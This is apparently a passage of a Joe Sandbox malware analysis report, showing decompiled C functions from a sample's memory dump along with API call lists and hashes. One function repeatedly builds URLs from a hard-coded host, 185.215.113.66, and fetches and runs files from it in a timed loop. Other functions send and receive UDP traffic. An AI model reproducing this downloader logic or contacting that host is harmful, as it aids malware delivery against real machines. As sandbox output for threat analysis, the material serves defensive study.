                                                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                                                    				char _v148;
                                                                                                                                                                                                                                                                                    				intOrPtr _v152;
                                                                                                                                                                                                                                                                                    				intOrPtr _v156;
                                                                                                                                                                                                                                                                                    				intOrPtr _v160;
                                                                                                                                                                                                                                                                                    				intOrPtr _v164;
                                                                                                                                                                                                                                                                                    				intOrPtr _v168;
                                                                                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                                                                                    				signed char _t35;
                                                                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v168 = 0x411130;
                                                                                                                                                                                                                                                                                    				_v164 = 0x411134;
                                                                                                                                                                                                                                                                                    				_v160 = 0x411138;
                                                                                                                                                                                                                                                                                    				_v156 = 0x41113c;
                                                                                                                                                                                                                                                                                    				_v152 = 0x411140;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    					_v172 = 0;
                                                                                                                                                                                                                                                                                    					while(_v172 < 5) {
                                                                                                                                                                                                                                                                                    						Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t45 + _v172 * 4 - 0xa4)));
                                                                                                                                                                                                                                                                                    						_push("http://185.215.113.66/");
                                                                                                                                                                                                                                                                                    						wsprintfA( &_v148, "%s%s");
                                                                                                                                                                                                                                                                                    						_t35 = E0040D440( &_v148, _t45 + _v172 * 4 - 0x28); // executed
                                                                                                                                                                                                                                                                                    						_t46 = _t46 + 0x18;
                                                                                                                                                                                                                                                                                    						if((_t35 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    							E0040D4F0( &_v148, 0); // executed
                                                                                                                                                                                                                                                                                    							_t46 = _t46 + 8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v172 = _v172 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0xdbba0); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x00405cf9
                                                                                                                                                                                                                                                                                    0x00405d02
                                                                                                                                                                                                                                                                                    0x00405d05
                                                                                                                                                                                                                                                                                    0x00405d08
                                                                                                                                                                                                                                                                                    0x00405d0b
                                                                                                                                                                                                                                                                                    0x00405d0e
                                                                                                                                                                                                                                                                                    0x00405d11
                                                                                                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                                                                                                    0x00405d17
                                                                                                                                                                                                                                                                                    0x00405d1a
                                                                                                                                                                                                                                                                                    0x00405d1d
                                                                                                                                                                                                                                                                                    0x00405d27
                                                                                                                                                                                                                                                                                    0x00405d31
                                                                                                                                                                                                                                                                                    0x00405d3b
                                                                                                                                                                                                                                                                                    0x00405d45
                                                                                                                                                                                                                                                                                    0x00405d4f
                                                                                                                                                                                                                                                                                    0x00405d54
                                                                                                                                                                                                                                                                                    0x00405d5a
                                                                                                                                                                                                                                                                                    0x00405d75
                                                                                                                                                                                                                                                                                    0x00405d83
                                                                                                                                                                                                                                                                                    0x00405d96
                                                                                                                                                                                                                                                                                    0x00405d97
                                                                                                                                                                                                                                                                                    0x00405da8
                                                                                                                                                                                                                                                                                    0x00405dc3
                                                                                                                                                                                                                                                                                    0x00405dc8
                                                                                                                                                                                                                                                                                    0x00405dd1
                                                                                                                                                                                                                                                                                    0x00405ddc
                                                                                                                                                                                                                                                                                    0x00405de1
                                                                                                                                                                                                                                                                                    0x00405de1
                                                                                                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                                                                                                    0x00405deb
                                                                                                                                                                                                                                                                                    0x00405deb

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleep$wsprintf
                                                                                                                                                                                                                                                                                    • String ID: %s%s$http://185.215.113.66/
                                                                                                                                                                                                                                                                                    • API String ID: 3195947292-2646931437
                                                                                                                                                                                                                                                                                    • Opcode ID: 8f39e41e58bdf373db040d32c454ae668075a299f55bd785de77a12adc482b7f
                                                                                                                                                                                                                                                                                    • Instruction ID: 33448fd8f16b6151abdcaf40b6ca2b1b809edec1cb8df60be6306fd5b5127b81
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f39e41e58bdf373db040d32c454ae668075a299f55bd785de77a12adc482b7f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22213B70E00318AFCB50DF64DD45BDEBBB4AF09304F1080ABD24DB6281DB785A898F5A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E0040DBD0(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                                                                                                                                                                                                                    				short _v6;
                                                                                                                                                                                                                                                                                    				short _v10;
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				int* _v24;
                                                                                                                                                                                                                                                                                    				char _v25;
                                                                                                                                                                                                                                                                                    				char _v29;
                                                                                                                                                                                                                                                                                    				int* _v52;
                                                                                                                                                                                                                                                                                    				char _v53;
                                                                                                                                                                                                                                                                                    				short _t30;
                                                                                                                                                                                                                                                                                    				short _t35;
                                                                                                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                                                                                                    				int* _t45;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                                                                                                    				long _t67;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t50 = _a4;
                                                                                                                                                                                                                                                                                    				_t64 = __eax;
                                                                                                                                                                                                                                                                                    				_t30 = 0;
                                                                                                                                                                                                                                                                                    				_v25 = 0;
                                                                                                                                                                                                                                                                                    				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					return _t30;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t60 = __eax + 4;
                                                                                                                                                                                                                                                                                    					_t45 = E00408B20(_t60);
                                                                                                                                                                                                                                                                                    					_t6 =  &(_t45[1]); // 0x4
                                                                                                                                                                                                                                                                                    					_v24 = _t45;
                                                                                                                                                                                                                                                                                    					 *_t45 = _t64;
                                                                                                                                                                                                                                                                                    					memcpy(_t6, _a8, _t64);
                                                                                                                                                                                                                                                                                    					_v18 = 0;
                                                                                                                                                                                                                                                                                    					_v14 = 0;
                                                                                                                                                                                                                                                                                    					_v10 = 0;
                                                                                                                                                                                                                                                                                    					_v6 = 0;
                                                                                                                                                                                                                                                                                    					_t35 = _a16;
                                                                                                                                                                                                                                                                                    					_v20 = 2;
                                                                                                                                                                                                                                                                                    					__imp__#9(_t35);
                                                                                                                                                                                                                                                                                    					_v22 = _t35;
                                                                                                                                                                                                                                                                                    					_v20 = _a12;
                                                                                                                                                                                                                                                                                    					if(_t60 == 0) {
                                                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                                                    						_v29 = 1;
                                                                                                                                                                                                                                                                                    						E00408C70(_t45);
                                                                                                                                                                                                                                                                                    						return _v29;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							_t38 = _a4;
                                                                                                                                                                                                                                                                                    							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10); // executed
                                                                                                                                                                                                                                                                                    							_t67 = _t38;
                                                                                                                                                                                                                                                                                    							if(_t67 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                                                                                                                                                                                                                    							_t60 = _t60 - _t67;
                                                                                                                                                                                                                                                                                    							_t45 = _t45 + _t67;
                                                                                                                                                                                                                                                                                    							if(_t60 != 0) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v53 = 1;
                                                                                                                                                                                                                                                                                    								E00408C70(_v52);
                                                                                                                                                                                                                                                                                    								return _v53;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                                                                                                                                    							E00408C70(_v52);
                                                                                                                                                                                                                                                                                    							_t30 = _v53;
                                                                                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t45 = _v52;
                                                                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x0040dbd9
                                                                                                                                                                                                                                                                                    0x0040dbde
                                                                                                                                                                                                                                                                                    0x0040dbe0
                                                                                                                                                                                                                                                                                    0x0040dbe3
                                                                                                                                                                                                                                                                                    0x0040dbe9
                                                                                                                                                                                                                                                                                    0x0040dcea
                                                                                                                                                                                                                                                                                    0x0040dcf0
                                                                                                                                                                                                                                                                                    0x0040dc0d
                                                                                                                                                                                                                                                                                    0x0040dc0d
                                                                                                                                                                                                                                                                                    0x0040dc16
                                                                                                                                                                                                                                                                                    0x0040dc1d
                                                                                                                                                                                                                                                                                    0x0040dc21
                                                                                                                                                                                                                                                                                    0x0040dc25
                                                                                                                                                                                                                                                                                    0x0040dc27
                                                                                                                                                                                                                                                                                    0x0040dc2e
                                                                                                                                                                                                                                                                                    0x0040dc32
                                                                                                                                                                                                                                                                                    0x0040dc36
                                                                                                                                                                                                                                                                                    0x0040dc3a
                                                                                                                                                                                                                                                                                    0x0040dc3f
                                                                                                                                                                                                                                                                                    0x0040dc4b
                                                                                                                                                                                                                                                                                    0x0040dc50
                                                                                                                                                                                                                                                                                    0x0040dc59
                                                                                                                                                                                                                                                                                    0x0040dc5e
                                                                                                                                                                                                                                                                                    0x0040dc64
                                                                                                                                                                                                                                                                                    0x0040dcc0
                                                                                                                                                                                                                                                                                    0x0040dcc1
                                                                                                                                                                                                                                                                                    0x0040dcc6
                                                                                                                                                                                                                                                                                    0x0040dcd8
                                                                                                                                                                                                                                                                                    0x0040dc66
                                                                                                                                                                                                                                                                                    0x0040dc66
                                                                                                                                                                                                                                                                                    0x0040dc66
                                                                                                                                                                                                                                                                                    0x0040dc78
                                                                                                                                                                                                                                                                                    0x0040dc7e
                                                                                                                                                                                                                                                                                    0x0040dc83
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dc8d
                                                                                                                                                                                                                                                                                    0x0040dc93
                                                                                                                                                                                                                                                                                    0x0040dc95
                                                                                                                                                                                                                                                                                    0x0040dc99
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dc9b
                                                                                                                                                                                                                                                                                    0x0040dca0
                                                                                                                                                                                                                                                                                    0x0040dca5
                                                                                                                                                                                                                                                                                    0x0040dcb7
                                                                                                                                                                                                                                                                                    0x0040dcb7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dc99
                                                                                                                                                                                                                                                                                    0x0040dcba
                                                                                                                                                                                                                                                                                    0x0040dcde
                                                                                                                                                                                                                                                                                    0x0040dce3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dcbc
                                                                                                                                                                                                                                                                                    0x0040dcbc
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dcbc
                                                                                                                                                                                                                                                                                    0x0040dcba
                                                                                                                                                                                                                                                                                    0x0040dc64
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040DC27
                                                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 0040DC50
                                                                                                                                                                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040DC78
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DC8D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                                                                                                    • String ID: pdu
                                                                                                                                                                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                                                                                                                                                                    • Opcode ID: 00fe08272ed9c7b572648fe8f30bd67711d724d5716b1731dde4f50e85e3541e
                                                                                                                                                                                                                                                                                    • Instruction ID: 1900bc5e36bec968277d7fd378407ddad580e15f752f42e7870c86cf4b77d333
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00fe08272ed9c7b572648fe8f30bd67711d724d5716b1731dde4f50e85e3541e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F31E1766083009FD710DFA9D880A9BB7E4AF89714F04456EF99897382D674CD08CBEB
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                                                                    			E0040DAD0(char* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				short _v28;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                                                    				char _v56;
                                                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                                                    				char* _t23;
                                                                                                                                                                                                                                                                                    				short _t26;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				short _t34;
                                                                                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                                                    				long _t47;
                                                                                                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t40 = __edx;
                                                                                                                                                                                                                                                                                    				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                                                                                                                                                                                                                    				_t34 = 0;
                                                                                                                                                                                                                                                                                    				_t43 = _a4;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					_t23 =  &_v32;
                                                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                                                    					__imp__#10( *(_t43 + 8), 0x4004667f, _t23); // executed
                                                                                                                                                                                                                                                                                    					if(_t23 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t37 = _v44;
                                                                                                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                                                                                                    						if(_t34 == 0 || _v40 < _t37) {
                                                                                                                                                                                                                                                                                    							_v40 = _t37;
                                                                                                                                                                                                                                                                                    							_t26 = E00408B60(_t37, _t40, _t34, _t37);
                                                                                                                                                                                                                                                                                    							_t37 = _v44;
                                                                                                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                                                    							_t34 = _t26;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v30 = 0;
                                                                                                                                                                                                                                                                                    						_v26 = 0;
                                                                                                                                                                                                                                                                                    						_v22 = 0;
                                                                                                                                                                                                                                                                                    						_v18 = 0;
                                                                                                                                                                                                                                                                                    						_t29 =  *(_t43 + 8);
                                                                                                                                                                                                                                                                                    						_v32 = 0;
                                                                                                                                                                                                                                                                                    						_t40 =  &_v32;
                                                                                                                                                                                                                                                                                    						_v36 = 0x10;
                                                                                                                                                                                                                                                                                    						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                                                                    						_t47 = _t29;
                                                                                                                                                                                                                                                                                    						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                                                                                                                                                                                                                    							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                                                                                                                                                                                                                    							_t40 =  &_v56;
                                                                                                                                                                                                                                                                                    							E0040D9A0(_t43, _t34, _t47, _v68,  &_v56);
                                                                                                                                                                                                                                                                                    							_t50 = _t50 + 0x14;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                                                                                                                                                                                                                    				return E00408C70(_t34);
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x0040dad0
                                                                                                                                                                                                                                                                                    0x0040dad6
                                                                                                                                                                                                                                                                                    0x0040dadb
                                                                                                                                                                                                                                                                                    0x0040dade
                                                                                                                                                                                                                                                                                    0x0040dae1
                                                                                                                                                                                                                                                                                    0x0040dae5
                                                                                                                                                                                                                                                                                    0x0040dae8
                                                                                                                                                                                                                                                                                    0x0040daf3
                                                                                                                                                                                                                                                                                    0x0040dafb
                                                                                                                                                                                                                                                                                    0x0040db04
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040db0a
                                                                                                                                                                                                                                                                                    0x0040db10
                                                                                                                                                                                                                                                                                    0x0040db18
                                                                                                                                                                                                                                                                                    0x0040db22
                                                                                                                                                                                                                                                                                    0x0040db26
                                                                                                                                                                                                                                                                                    0x0040db2b
                                                                                                                                                                                                                                                                                    0x0040db2f
                                                                                                                                                                                                                                                                                    0x0040db32
                                                                                                                                                                                                                                                                                    0x0040db32
                                                                                                                                                                                                                                                                                    0x0040db38
                                                                                                                                                                                                                                                                                    0x0040db3c
                                                                                                                                                                                                                                                                                    0x0040db40
                                                                                                                                                                                                                                                                                    0x0040db44
                                                                                                                                                                                                                                                                                    0x0040db4e
                                                                                                                                                                                                                                                                                    0x0040db51
                                                                                                                                                                                                                                                                                    0x0040db56
                                                                                                                                                                                                                                                                                    0x0040db60
                                                                                                                                                                                                                                                                                    0x0040db68
                                                                                                                                                                                                                                                                                    0x0040db6e
                                                                                                                                                                                                                                                                                    0x0040db73
                                                                                                                                                                                                                                                                                    0x0040db7e
                                                                                                                                                                                                                                                                                    0x0040db88
                                                                                                                                                                                                                                                                                    0x0040db91
                                                                                                                                                                                                                                                                                    0x0040db96
                                                                                                                                                                                                                                                                                    0x0040db96
                                                                                                                                                                                                                                                                                    0x0040db73
                                                                                                                                                                                                                                                                                    0x0040dba5
                                                                                                                                                                                                                                                                                    0x0040dbbf

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040DAFB
                                                                                                                                                                                                                                                                                    • recvfrom.WS2_32 ref: 0040DB68
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DB7E
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040DB9F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 42d21b16754e23747dafd69a251c4984d532d74facc10c73496740973b16efae
                                                                                                                                                                                                                                                                                    • Instruction ID: 93b40cc26d049a7996018c96e8ad19021b123b172151b20c2622c6b09396bf40
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42d21b16754e23747dafd69a251c4984d532d74facc10c73496740973b16efae
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33216FB1904305AFD314DF65DC84A6BB7E8EF84314F004A3EF459A2291E774A9488BAA
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 00405BA8
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(004169D8), ref: 00405BB3
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00405BD8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405910: SysFreeString.OLEAUT32(00000000), ref: 00405B28
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00405BD2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 459949847-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6cd694fec373ba90f407f83b999d67f828c72ca168007c4fd3c8841ffbaea35b
                                                                                                                                                                                                                                                                                    • Instruction ID: 8e1ceaac5e3c15648392f9261d8fa4bd32f1c3ccaf3a14fdf2aec8c3e2deeebf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cd694fec373ba90f407f83b999d67f828c72ca168007c4fd3c8841ffbaea35b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9E048B5940208FBD704EBE0DD0EB9D7774DB05305F1041B5F50566291DAF99E80CB59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                    			E00405910(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                                                    				short _v36;
                                                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                                                    				intOrPtr _t95;
                                                                                                                                                                                                                                                                                    				intOrPtr _t110;
                                                                                                                                                                                                                                                                                    				void* _t118;
                                                                                                                                                                                                                                                                                    				void* _t199;
                                                                                                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t95 = E004058C0(0x4120d4, 0x4120e4); // executed
                                                                                                                                                                                                                                                                                    					_t200 = _t199 + 8;
                                                                                                                                                                                                                                                                                    					_v28 = _t95;
                                                                                                                                                                                                                                                                                    					if(_v28 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_push( &_v32);
                                                                                                                                                                                                                                                                                    					_push(_v28);
